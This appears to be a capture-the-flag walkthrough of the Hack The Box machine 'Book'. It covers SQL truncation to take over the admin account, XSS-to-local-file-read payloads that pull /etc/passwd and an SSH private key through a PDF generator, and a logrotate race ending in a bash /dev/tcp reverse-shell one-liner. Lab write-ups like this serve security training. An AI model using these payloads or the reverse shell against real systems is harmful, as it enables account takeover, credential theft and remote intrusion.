BOOK-HTB-WALKTHROUGH

Synopsis

Book is a medium-difficulty Linux box. The foothold is a SQL truncation vulnerability in the sign-up form: it lets us register an account that the application treats as the admin, in effect setting our own password for the admin portal. An XSS payload injected into a field that the server renders into a PDF then turns into local file read (LFI), which exposes the user's SSH private key. Finally, a race condition in logrotate gives us root.

Tools/Script used:

1. nmap: https://nmap.org/download.html
2. Burp Suite: https://portswigger.net/burp/communitydownload
3. logrotten (logrotate race condition exploit): https://github.com/whotwagner/logrotten

1. Port scan

    nmap -sC -sV -oA ports 10.10.10.176

2 USER

2.1 SQL Truncation Attack

The web application has sign-in and sign-up pages. After registering an account and logging in with it, I found the admin's email address on the site and enumerated further directories with gobuster.

Gobuster command used:
gobuster dir -u http://10.10.10.176/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x php,txt,html -o gobuster_result


I then tried to register a second account with the admin's email address, but the application rejected it with the error "user exists". Looking at the page source, I found that the sign-up form limits the email field to 20 characters. That limit lives in the page itself, not on the server, so it can be bypassed by editing the request in Burp Suite.


Taking a hint from the HTB forum, I looked into the SQL truncation attack.
I registered a new account with the email "admin@book.htb      a": the real address, padded with spaces, followed by "a" as the 21st character. The application's existence check compares this full 21-character string against the database, where only "admin@book.htb" exists, so nothing matches and the sign-up goes ahead. The email column is only 20 characters wide, and the database silently truncates the value to fit (MySQL does this when strict mode is off), so the "a" is dropped and "admin@book.htb      ", trailing spaces included, is stored. Because MySQL's default PAD SPACE collations ignore trailing spaces in string comparisons, that stored value compares equal to "admin@book.htb".

The result is a second row that the login query matches for the admin's email with the password I chose at sign-up. In effect we have set a new password for the admin account and can log in to the administrator portal.

login portal for admin: http://book.htb/admin
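
The mechanics above written out in SQL, as an added example that is not part of the original walkthrough. It is written for MySQL, whose non-strict truncation and PAD SPACE comparison are what the attack relies on; the users table, its column names and the placeholder password values are assumptions, since the application's real schema is not shown.

```sql
-- Added example (not from the walkthrough). Hypothetical schema: the real
-- application's table and column names are not known.
CREATE TABLE users (
    id       INT AUTO_INCREMENT PRIMARY KEY,
    email    VARCHAR(20)  NOT NULL,   -- the 20-character limit seen in the sign-up page
    password VARCHAR(255) NOT NULL    -- stored hash; placeholder values below
);
INSERT INTO users (email, password) VALUES ('admin@book.htb', 'hash_of_admin_password');

-- 1. Vulnerable sign-up: the "user exists" check runs on the raw input.
--    The 21-character string is not equal to 'admin@book.htb', so the check passes.
SELECT COUNT(*) FROM users WHERE email = 'admin@book.htb      a';
-- -> 0

-- 2. With strict mode off, MySQL truncates the value to the column width
--    instead of raising an error: the 'a' is cut off, the trailing spaces stay.
SET SESSION sql_mode = '';
INSERT INTO users (email, password) VALUES ('admin@book.htb      a', 'hash_of_attacker_password');
-- Warning 1265: Data truncated for column 'email' at row 1
SELECT id, CONCAT('[', email, ']') AS stored FROM users WHERE id = 2;
-- -> 2, [admin@book.htb      ]

-- 3. Login: under a PAD SPACE collation (utf8mb4_general_ci, utf8mb4_unicode_ci, ...)
--    trailing spaces are ignored, so the attacker's row matches the admin's email
--    together with the attacker's own password.
SELECT id FROM users
WHERE email = 'admin@book.htb' AND password = 'hash_of_attacker_password';
-- -> 2  (the application now treats this session as admin@book.htb)

-- Fix: reject over-long values instead of truncating them, and let the database
-- enforce uniqueness so a padded duplicate cannot be inserted at all. The
-- application should additionally validate the length server-side.
SET SESSION sql_mode = 'STRICT_TRANS_TABLES';
ALTER TABLE users ADD UNIQUE KEY uq_users_email (email);
INSERT INTO users (email, password) VALUES ('admin@book.htb      a', 'x');
-- ERROR 1406: Data too long for column 'email' at row 1
INSERT INTO users (email, password) VALUES ('admin@book.htb      ', 'x');
-- ERROR 1062: Duplicate entry for key 'uq_users_email' (PAD SPACE applies to the index too)
```

One caveat when testing this elsewhere: MySQL 8.0's default collation utf8mb4_0900_ai_ci is NO PAD, so step 3 would not match there even though the truncated row is still inserted; the attack in this form needs both the non-strict mode and a PAD SPACE collation on the email column.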

2.2 LFI via XSS

Normal users can upload files, and the uploaded files can be downloaded from the admin portal.

The PDF is generated dynamically on the server from the submitted book data, so a script injected through the "book title" field is executed by the PDF generator itself rather than in a browser. That process can open local files via file:// URLs, which turns the XSS into local file read.
Payload:
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText.small())};x.open("GET","file:///etc/passwd");x.send();</script>

PDF Generated:

The /etc/passwd contents show a user named "reader", so next I read that user's SSH private key with the same technique.
Payload:
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText.small())};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>
PDF Generated:

2.3 User Flag

Copy the key out of the PDF into a file named id_rsa, checking that the BEGIN/END lines and the line breaks survived the copy (a mangled key fails to load), then:

  • chmod 600 id_rsa
  • ssh -i id_rsa reader@10.10.10.176

3 ROOT

The home directory of the user "reader" contains a backup directory with log files in it.
Running pspy64 showed logrotate being executed as root. logrotate is the tool that rotates log files written by system services; with its create directive it renames the old log and then creates a fresh, empty file in its place.
That rename-then-create sequence is a race condition when the log's directory is controlled by a low-privileged user, as the backup directory here is controlled by reader: between the rename and the create, the user can replace the directory with a symlink to a root-owned directory, so the new log file is created there, still owned by the user, and the user can write whatever they like into it. logrotten automates exactly this.

Payload (replace 10.0.0.1 with the attacker machine's IP and have a listener such as nc -lvnp 8080 waiting on it before the rotation fires):
  • echo "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1" > payloadfile
  • chmod +x payloadfile
 

References:

3. logrotten: https://github.com/whotwagner/logrotten

Thank you for reading.
